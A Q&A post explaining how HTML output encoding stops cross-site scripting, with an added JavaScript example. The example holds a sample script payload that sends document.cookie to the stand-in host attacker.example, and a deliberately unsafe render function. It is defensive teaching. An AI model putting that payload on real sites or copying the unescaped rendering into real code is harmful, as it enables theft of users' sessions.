Why does HTML encoding prevent certain XSS attacks?
Question
I have been reading that you HTML encode on the way back from the server to the client (I think?) and this will prevent many types of XSS attacks. However, I don't understand at all. The HTML is still going to be consumed and rendered by the browser, right?
How is this stopping anything?
I've read about this in multiple locations, websites and books, and nowhere does it actually explain why this works.
Answer
Think about it: what does encoded HTML look like? For example, it could look like this:
&lt;a href="www.stackoverflow.com"&gt;
So it will be rendered on the client as the literals (as <a href="www.stackoverflow.com">), not as HTML. Meaning you won't see an actual link, but the code itself.
XSS attacks work on the basis that someone can make a client browser parse HTML that the site provider didn't intend to be there; if the above weren't encoded, it would mean that the provided link would be embedded in the site, although the site provider didn't want that.
XSS is of course a little more elaborate than that, and usually involves JavaScript as well (hence the Cross Site Scripting), but for demonstration purposes this simple example should suffice; it's the same with JavaScript code as with simple HTML tags, since XSS is a special case of the more general HTML injection.
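The following is an added example illustrating the answer above; it is not code from the original post or its author. It assumes a hypothetical comment-rendering template, a constructed attacker payload pointing at the made-up host `attacker.example`, and the helper names `escapeHtml`, `renderCommentUnsafe`, `renderCommentSafe` and `injectedTagNames`, all chosen here for illustration. It shows the same untrusted string concatenated into a page raw (the browser sees a `<script>` element) and after HTML encoding (the browser sees only text).

```javascript
// Added example (not from the original answer): HTML-encoding untrusted text
// before it is placed into a page body, contrasted with inserting it raw.

// Replace the characters that have meaning to the HTML parser with entities.
// These five are sufficient for element text content and for quoted
// attribute values; they are NOT sufficient for JavaScript, URL or CSS
// contexts, which need their own encoders.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#x27;",
};

function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Constructed sample of attacker-controlled input, e.g. a comment field.
// (attacker.example is a hypothetical host used only for this example.)
const ATTACK_COMMENT =
  '<script>document.location="http://attacker.example/?c="+document.cookie</script>';

// Vulnerable rendering: the server concatenates user input straight into the
// HTML it sends back, so the browser parses the attacker's <script> tag.
function renderCommentUnsafe(comment) {
  return `<div class="comment">${comment}</div>`;
}

// Fixed rendering: the same template, but the input is encoded first. The
// browser displays the literal text "<script>...</script>" and runs nothing.
function renderCommentSafe(comment) {
  return `<div class="comment">${escapeHtml(comment)}</div>`;
}

// Rough approximation of "which tags will the browser see": list the tag
// names in the output that did not come from the template itself. A real
// HTML parser is far more lenient than this regex, which is exactly why the
// fix is encoding rather than blacklisting; this only makes the difference
// visible.
function injectedTagNames(html) {
  const names = [];
  for (const m of html.matchAll(/<\/?([a-zA-Z][a-zA-Z0-9]*)/g)) {
    names.push(m[1].toLowerCase());
  }
  return names.filter((n) => n !== "div");
}

// Stand-alone demonstration.
console.log("raw   :", renderCommentUnsafe(ATTACK_COMMENT));
console.log("tags  :", injectedTagNames(renderCommentUnsafe(ATTACK_COMMENT)));
console.log("safe  :", renderCommentSafe(ATTACK_COMMENT));
console.log("tags  :", injectedTagNames(renderCommentSafe(ATTACK_COMMENT)));
```

Two caveats a practitioner should keep in mind: the encoding must match the context the data lands in (text between tags and quoted attribute values are covered above; an unquoted attribute, an inline event handler, a `javascript:` URL or a `<script>` block each need a different treatment), and encoding is applied at output time, not at storage time, so the same stored string can be emitted safely into HTML, JSON or a URL as needed.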